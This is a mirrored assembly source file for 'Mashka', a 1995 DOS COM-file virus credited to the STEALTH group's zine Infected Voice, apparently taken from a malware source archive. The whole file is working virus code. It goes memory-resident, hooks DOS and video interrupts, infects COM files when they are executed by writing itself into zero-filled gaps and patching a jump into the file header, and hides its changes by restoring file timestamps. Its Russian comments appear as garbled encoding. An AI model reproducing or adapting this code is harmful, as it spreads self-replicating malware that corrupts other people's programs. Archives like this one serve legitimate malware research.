mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-22 01:58:51 +00:00
4b9382ddbc
push
452 lines
12 KiB
NASM
452 lines
12 KiB
NASM
;ÛßßßßßßßßßßßßßßßÛ ß ß ÛÛßÛÛßÛÛ
|
||
;Û STEALTH group Û° Û ÛßÜ Ûßß Üßß Üßß ßÛß Üßß ÛßÛ Ý Û ÜßÛ Û Üßß Üßß ÛÛ ßß ÛÛ
|
||
;Û presents Û° Û Û Û Ûß Ûß Û Û Ûß Û Û Û Û Û Û Û Û ßÛßß ÛÛÛÛÛ ÛÛ
|
||
;ÛÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÛ° Þ Þ Þ Þ ÞÜÜ ÞÜÜ Þ ÞÜÜ ÞÜß ßÛ ßÜÛ Þ ÞÜÜ ÞÜÜ ÛÛÛÛÛÜÛÛ
|
||
; °°°°°°°°°°°°°°°°° JAN 1995
|
||
;
|
||
; INFECTED VOICE. Issue 4. January 1995. (C) STEALTH group, Kiev 148, Box 10.
|
||
; ===========================================================================
|
||
|
||
|
||
TITLE Virus Mashka ; ªáâ ⨠áâ®ï饥 §¢ ¨¥ !
|
||
seg_a segment para 'code'
|
||
assume cs:seg_a,ds:seg_a
|
||
|
||
org 100h
|
||
|
||
start:
|
||
call $+3 ;áâ àë© ¤®¡àë© call
|
||
pop bx
|
||
push es
|
||
sub bx,3 ; ç «® ¢¨àãá
|
||
push bx
|
||
mov ax,0e200h ;âà ¤¨æ¨® ï ¯à®¢¥àª «¨ç¨¥ ¢ ¯ ¬ïâ¨
|
||
int 21h
|
||
cmp al,22h
|
||
jnz res ;¥á«¨ á ¥â, § ç¨â ¡ã¤¥¬
|
||
jmp short nores ;¬ë 㦥 ¥áâì
|
||
res:
|
||
mov ax,ds
|
||
dec ax
|
||
mov ds,ax ;ᥣ¬¥â MSB
|
||
mov ax,word ptr ds:[3]
|
||
sub ax,(offset virend - offset start)/10h+1+20h ;㬥ìè ¥¬ à §¬¥à ¡«®ª
|
||
mov word ptr ds:[3],ax
|
||
mov ax,ds
|
||
inc ax
|
||
mov ds,ax
|
||
mov ax,word ptr ds:[2] ;ª®«¢® ᢮¡®¤®© ¯ ¬ïâ¨
|
||
sub ax,(offset virend - offset start)/10h+1+20h ;®â¨¬ ¥¬ à §¬¥à vir'
|
||
mov es,ax
|
||
mov word ptr ds:[2],ax
|
||
mov cx,offset virend - offset start
|
||
mov si,bx
|
||
xor di,di
|
||
push cs
|
||
pop ds
|
||
rep movsb ; ¯¥à¥ª 稢 ¥¬ ⥫® ¢ ¢ë¤¥«¥ãî ®¡« áâì es:di
|
||
push es
|
||
pop ds
|
||
mov ax,3521h ; ã §¤¥áì, ¤¥îáì , ¢ë ¯®¨¬ ¥â¥ , çâ® ¯à®¨á室¨â
|
||
int 21h
|
||
mov word ptr ds:[offset int21e - offset start],bx
|
||
mov word ptr ds:[offset int21e+2 - offset start],es
|
||
mov ax,2521h
|
||
mov dx,offset int21entry - offset start
|
||
int 21h ; ¯¥à¥å¢ âë¢ ¥¬ int 21h
|
||
mov ax,3510h
|
||
int 21h
|
||
mov word ptr ds:[offset int10e - offset start],bx
|
||
mov word ptr ds:[offset int10e+2 - offset start],es
|
||
mov ax,2510h
|
||
mov dx,offset int10entry - offset start
|
||
int 21h ; ¯¥à¥å¢ âë¢ ¥¬ int 10h
|
||
; ¤«ï ¢¥à⮫¥â
|
||
nores:
|
||
; ¥á«¨ ¢¨àãá 㦥 ¢ ¯ ¬ï⨠, â® ®áâ ¥âáï ⮫쪮 à ¤®¢ âìáï
|
||
|
||
pop bx
|
||
|
||
; ᥩç á ¡ã¤¥¬ ¯®«ãç âì ®à¨£¨ «ìë¥ ¡ ©âë ¯à®£à ¬¬ë ,
|
||
; ¢ë१ ë¥ ¨§ ç « ¯à®£à ¬¬ë
|
||
|
||
mov ax,word ptr cs:[bx + offset real - offset start]
|
||
mov bx,word ptr cs:[bx + offset real - offset start + 2]
|
||
push cs
|
||
pop ds
|
||
mov word ptr cs:[100h],ax ;ᮮ⢥âá⢥® ¢®§¢à é ¥¬ ¨å ¬¥áâ®
|
||
mov word ptr cs:[102h],bx
|
||
mov ax,100h ; ¤à¥áá ¤«ï ¢®§¢à â ç «® ¯à®£à ¬¬ë
|
||
pop es
|
||
push ax
|
||
ret
|
||
|
||
real dw 4cb4h ; ¢®â ®¨ த¨¬ë¥ , ®à¨£¨ «ìë¥ !
|
||
dw 21cdh
|
||
|
||
INT21entry:
|
||
cmp ax,0e200h ; ¯à®¢¥à塞 ᮡá⢥ãî äãªæ¨î,
|
||
; ª®â®àãî ¢¨àãá ¢ë¯®«ï¥â çâ®¡ë ¯à®¢¥à¨âì
|
||
; ᢮¥ «¨ç¨¥ ¢ ¯ ¬ïâ¨
|
||
jnz d01
|
||
mov al,22h
|
||
iret
|
||
d01:
|
||
cmp ax,0e233h ; ᥪà¥â ï äãªæ¨ï , ¢®§¢à é îé ï ®à¨£¨ «ìë¥
|
||
; ¤à¥á ¯à¥àë¢ ¨© ¨ à §¬¥à ¢¨àãá (¤«ï ¢®§¬®¦®á⨠«¥ç¥-
|
||
; ¨ï «î¡®© ¢¥àᨨ
|
||
jnz d1
|
||
mov al,22h
|
||
mov bx,cs
|
||
; ¢®â ®¨ , í⨠offset'ë
|
||
mov cx,offset real - offset start
|
||
mov dx,offset int21e - offset start
|
||
mov si,offset int10e - offset start
|
||
iret
|
||
d1:
|
||
cmp ah,4bh ; ª ª ¢¨¤¨â¥ , äãªæ¨ï 4b - £« ¢ ï ¯à¨ç¨ § à ¦¥¨ï
|
||
jz in4b
|
||
jmp exitint21 ; ¥á«¨ ¥ 4b , â® ¬ë ¢á¥ à ¢® ¯®¤®¦¤¥¬
|
||
|
||
; ‚®â áî¤ ®¡ëç® ¯®¯ ¤ îâ , ª®£¤ ¤¥« îâ INT 21h
|
||
|
||
in4b:
|
||
push ax ; ¢¨¬ ¨¥ žŒŽ<C592> ! ’¥ªá⮢ ï áâப 'PSQR'
|
||
push bx
|
||
push cx
|
||
push dx
|
||
|
||
push es
|
||
push ds
|
||
push si
|
||
push di
|
||
|
||
push dx
|
||
push ds
|
||
push cs
|
||
pop ds
|
||
mov ax,2524h
|
||
mov dx,offset int24entry - offset start
|
||
int 21h ;¯¥à¥å¢ â ªà¨â¨ç¥áª®© ®è¨¡ª¨
|
||
;¯à®¨á室¨â ⮫쪮 ¯à¨ § ¯ã᪥,
|
||
;¤ ¡ë ä ©«ë ¥ ¯¥ç â «¨áì
|
||
;¯à¨â¥à , ª®â®à®£® ¥âã !
|
||
pop ds
|
||
pop dx
|
||
|
||
call cmpnol ;¨é¥¬ ®«ì ¢ ª®æ¥ ¯ãâ¨ á ¨¬¥¥¬
|
||
call cmpcom ; ¥ COM «¨ íâ® á«ãç ©® ?
|
||
jnc pr1 ; €ƒ€ ! ‡ ç¨â ¢á¥-â ª¨ COM !
|
||
jmp exit ; ã ¥ ¡ã¤¥¬ § à ¦ âì, çâ® ¯®¤¥« âì ...
|
||
pr1:
|
||
;á®åà 塞 ¢ ¯¥à¥¬¥ë¥ ᥣ¬¥â ¨ ᬥ饨¥ § ¯ã᪠¥¬®£® ä ©«
|
||
|
||
mov word ptr cs:[offset adname - offset start],dx
|
||
mov word ptr cs:[offset adname - offset start+2],ds
|
||
call catt ;áïâì âਡãâë
|
||
mov ax,3d02h ;®âªàë¢ ¥¬ ä ©«
|
||
int 21h
|
||
mov bx,ax
|
||
call gettime ;¯®«ãç ¥¬ ¨ á®åà 塞 ¢à¥¬ï
|
||
|
||
; íâ®â ªãá®ç¥ª §¤¥áì ª®¥ç® §àï,
|
||
; ® íâ® ¡ë«® ¤ ¢® ¨ ¥¯à ¢¤
|
||
mov ax,4202h
|
||
xor cx,cx
|
||
xor dx,dx
|
||
int 21h
|
||
|
||
push ds
|
||
push cs
|
||
pop ds ; ᥣ¬¥â ¤ ëå ãáâ ¢«¨¢ ¥¬ ª®¤ ¢¨àãá
|
||
|
||
mov ax,4200h ; §¤¥áì ª®¥ç® ¡ë«® ¢á¥ ¯ãâ ® ,® § ¬¥âìâ¥,
|
||
; CX:DX ¢á¥ à ¢® 㫨
|
||
int 21h
|
||
|
||
mov ah,3fh
|
||
mov dx,offset virend - offset start
|
||
mov cx,4h
|
||
int 21h ; ç¨â ¥¬ ç «® ä ©« ¢ ®¡« áâì § ¢¨àãᮬ
|
||
|
||
; ¥á«¨ § à ¦¥® , â® ç¥â¢¥àâë© ¡ ©â ¤®«¦¥ ¡ëâì 'Q'
|
||
cmp byte ptr ds:[offset virend - offset start + 3],'Q'
|
||
jnz ok2
|
||
pop ds
|
||
jmp closeexit ; ¢ë室 á § ªàë⨥¬ ä ©« ¨ ¢®ááâ ®¢ª®© ®á⠫쮣®
|
||
; ¤®¡à
|
||
ok2:
|
||
xor si,si
|
||
mov dx,0 - 200h
|
||
p2:
|
||
;á«¥¤ãî騩 äà £¬¥â áç¨âë¢ ¥â ¢ ¯ ¬ïâì ¯®á«¥¤®¢ â¥«ì® ¢¥áì ä ©«
|
||
;¯® 200h ¨ ᪠¨àã¥â ®¯à¥¤¥«¥®¥ ª®«¨ç¥á⢮ ã«¥© ( ¨¬¥® 777),
|
||
|
||
mov ax,4200h
|
||
add dx,200h
|
||
xor cx,cx
|
||
int 21h
|
||
push ax
|
||
mov ah,3fh
|
||
mov dx,offset virend - offset start
|
||
mov cx,200h
|
||
int 21h
|
||
cmp ax,0
|
||
jnz d3
|
||
pop dx ; ä ©« § ª®ç¨«áï
|
||
jmp d2
|
||
d3:
|
||
cmp ax,200h
|
||
jz ok4
|
||
add ax,offset virend - offset start
|
||
mov di,ax
|
||
mov word ptr ds:[di],0ffh ; íâ® çâ®-â® ¢à®¤¥ ª®æ®¢®çª¨
|
||
ok4:
|
||
call scanspace ; ᪠¨à㥬 ¯à®ç¨â ë¥ 200h
|
||
pop dx
|
||
cmp si,offset virend - offset start
|
||
jc p2 ; ¥á«¨ ª®«-¢® ã«¥© ¬¥ìè¥ ç¥¬ à §¬¥à ¢¨àãá
|
||
; â® ¯à®¤®«¦ ¥¬ ᪠¨à®¢ ¨¥
|
||
|
||
sub di,(offset virend - offset start)
|
||
add dx,di
|
||
sub dx,si
|
||
push dx ; ¢ DX ᬥ饨¥ ¢ ä ©«¥ ,ª®â®à®¥ 㪠§ë¢ ¥â
|
||
; ©¤¥ãî ®¡« áâì á ã«ï¬¨
|
||
mov ax,4200h
|
||
xor cx,cx
|
||
xor dx,dx
|
||
int 21h
|
||
mov ah,3fh
|
||
mov cx,4h
|
||
mov dx,offset real - offset start
|
||
int 21h ; ç¨â ¥¬ ॠ«ìë¥ ¡ ©â¨ª¨ ¯à®£à.
|
||
mov ax,4200h
|
||
xor cx,cx
|
||
xor dx,dx
|
||
int 21h
|
||
mov si,offset virend - offset start
|
||
mov byte ptr ds:[si],0e9h
|
||
pop dx
|
||
push dx
|
||
sub dx,3
|
||
mov word ptr ds:[si+1],dx ; ¯®¤£®â ¢«¨¢ ¥¬ ç «ìë¥ ç¥âëॠ¡ ©â
|
||
mov byte ptr ds:[si+3],'Q' ; íâ® ¬¥âª § à ¦¥®áâ¨
|
||
mov ah,40h
|
||
mov cx,4h
|
||
mov dx,offset virend - offset start
|
||
int 21h ; § ¯¨áë¢ ¥¬ ¨å
|
||
pop dx ; ¢ DX ¤à¥á ®¡« á⨠á ã«ï¬¨
|
||
xor cx,cx
|
||
mov ax,4200h
|
||
int 21h
|
||
mov ah,40h
|
||
mov cx,offset virend - offset start
|
||
xor dx,dx
|
||
int 21h ; ¤®¯¨áë¢ ¥¬ â㤠⥫® ¢¨àãá
|
||
d2:
|
||
pop ds
|
||
closeexit:
|
||
call puttime ; ¢®ááâ ¢«¨¢ ¥¬ ¢à¥¬ï
|
||
mov ah,3eh
|
||
int 21h ; ¢á¥ ! à ¡®ç¨© ¤¥ì ª®ç¨«áï !
|
||
exit:
|
||
pop di
|
||
pop si
|
||
pop ds
|
||
pop es
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
exitint21:
|
||
db 0eah
|
||
int21e dw ?
|
||
dw ?
|
||
adname dw ?
|
||
dw ?
|
||
int24entry:
|
||
mov ax,0h ; íâ® ABORT ! •®à®è®, çâ® ¬ë ¥ ¢ ˆâ «¨¨ !
|
||
iret
|
||
time dw ?
|
||
dw ?
|
||
;------------------------------------- ¯®¨áª ã«ï ¢ ª®æ¥ ¯ãâ¨ á ¨¬¥¥¬
|
||
cmpnol:
|
||
mov bx,dx
|
||
nol:
|
||
inc bx
|
||
cmp byte ptr ds:[bx],0h
|
||
jnz nol
|
||
ret
|
||
;------------------------------------- ¯à®¢¥àª COM
|
||
cmpcom:
|
||
cmp word ptr ds:[bx-2],'MO'
|
||
clc
|
||
jz exitcmpexe
|
||
stc
|
||
exitcmpexe:
|
||
ret
|
||
;--------------------------------------- ¯®«ã票¥ ¨ ãáâ ®¢ª ®à¬ «ìëå
|
||
; âਡã⮢
|
||
catt:
|
||
push ds
|
||
push dx
|
||
mov ax,4300h
|
||
LDS dx,dword ptr cs:[offset adname - offset start]
|
||
int 21h
|
||
and cl,11111110b
|
||
mov ax,4301h
|
||
int 21h
|
||
pop dx
|
||
pop ds
|
||
ret
|
||
;--------------------------------------- ¯®«ã票¥ ¨ á®åà ¥¨¥ ¢à¥¬¥¨
|
||
gettime:
|
||
mov ax,5700h
|
||
int 21h
|
||
and cl,11100000b
|
||
mov word ptr cs:[offset time - offset start],cx
|
||
mov word ptr cs:[offset time - offset start+2],dx
|
||
ret
|
||
;----------------------------------------- ¢®§¢à 饨¥ áâ ண® ¢à¥¬¥¨ ;)
|
||
puttime:
|
||
mov ax,5701h
|
||
mov cx,word ptr cs:[offset time - offset start]
|
||
mov dx,word ptr cs:[offset time - offset start+2]
|
||
int 21h
|
||
ret
|
||
;------------------------------------------ ᪠¨à®¢ ¨¥ 㫨
|
||
scanspace:
|
||
mov di,offset virend - offset start - 1
|
||
opsc:
|
||
inc di
|
||
cmp di,(offset virend - offset start) + 200h
|
||
jnc exsc
|
||
mov al,ds:[di]
|
||
cmp al,0
|
||
jnz clscan
|
||
inc si
|
||
jmp opsc
|
||
exsc:
|
||
ret
|
||
clscan:
|
||
cmp si,offset virend - offset start
|
||
jc ok3
|
||
ret
|
||
ok3:
|
||
xor si,si
|
||
jmp opsc
|
||
|
||
int10entry:
|
||
cmp ax,0005h ; ¯à®¢¥àª ãáâ ®¢«¥¨¥ CGA 320x200
|
||
jz svert ; ¥á«¨ â ª®¢®©, â® à¨á㥬 ¯à®«¥â î騩 ¢¥à⮫¥â
|
||
exitint10:
|
||
db 0eah
|
||
int10e dw ?
|
||
dw ?
|
||
svert:
|
||
cmp si,22h
|
||
jz exitint10 ; ®¡å®¤¨¬ ᮡáâ¢¥ë¥ ¢ë§®¢ë
|
||
|
||
; <20>“ € <20>’Ž - ‚…<E2809A>’Ž‹…’ !
|
||
|
||
vert:
|
||
push ds
|
||
push ax
|
||
push bx
|
||
push cx
|
||
push dx
|
||
push si
|
||
push di
|
||
push bp
|
||
push es
|
||
|
||
push cs
|
||
pop ds
|
||
mov ax,0b800h
|
||
mov es,ax
|
||
mov si,22h
|
||
mov ax,5
|
||
int 10h
|
||
mov cx,70
|
||
mov dx,30
|
||
bb:
|
||
push cx
|
||
mov cx,6000h
|
||
zlp:
|
||
loop zlp
|
||
pop cx
|
||
|
||
call bert
|
||
loop bb
|
||
pop es
|
||
pop bp
|
||
pop di
|
||
pop si
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
pop ds
|
||
jmp exitint10
|
||
;------------------------
|
||
bert:
|
||
push dx
|
||
push cx
|
||
push ax
|
||
push si
|
||
push di
|
||
|
||
mov ax,dx
|
||
mov bx,80
|
||
mul bx
|
||
add ax,cx
|
||
mov di,ax
|
||
mov bp,0
|
||
mov si,offset berts - offset start
|
||
opbert:
|
||
mov cx,6
|
||
push di
|
||
rep movsb
|
||
pop di
|
||
add di,2000h
|
||
inc bp
|
||
cmp bp,12
|
||
je exbert
|
||
mov cx,6
|
||
push di
|
||
rep movsb
|
||
pop di
|
||
sub di,2000h-80
|
||
inc bp
|
||
cmp bp,12
|
||
je exbert
|
||
jmp opbert
|
||
exbert:
|
||
pop di
|
||
pop si
|
||
pop ax
|
||
pop cx
|
||
pop dx
|
||
ret
|
||
;================================
|
||
berts db 0,0,0,0,0,0 ; ¢¥à⮫¥â, ¨«¨ ¯®-ãªà ¨áª¨ - 奫¨ª®¯â¥à
|
||
db 0,0,0,0,0,0
|
||
db 0,0,55h,40h,0,0
|
||
db 0,0,4,0,0,0
|
||
db 0,1,44h,0,0,0
|
||
db 0,15h,55h,0,4,0
|
||
db 0,50h,57h,55h,55h,0
|
||
db 0,15h,75h,55h,4,0
|
||
db 0,5,55h,0,0,0
|
||
db 0,0,10h,0,0,0
|
||
db 0,0,0,0,0,0
|
||
db 0,0,0,0,0,0
|
||
;=================================
|
||
db '·‚“೟<C2B3>˜•Ÿàßß྇ཎŸ†‡àß' ; § è¨ä஢ ®¥ ¯®á« ¨¥ ¯®â®¬ª ¬
|
||
; î§ ©â¥ NEG.
|
||
|
||
virend:
|
||
seg_a ends
|
||
end start
|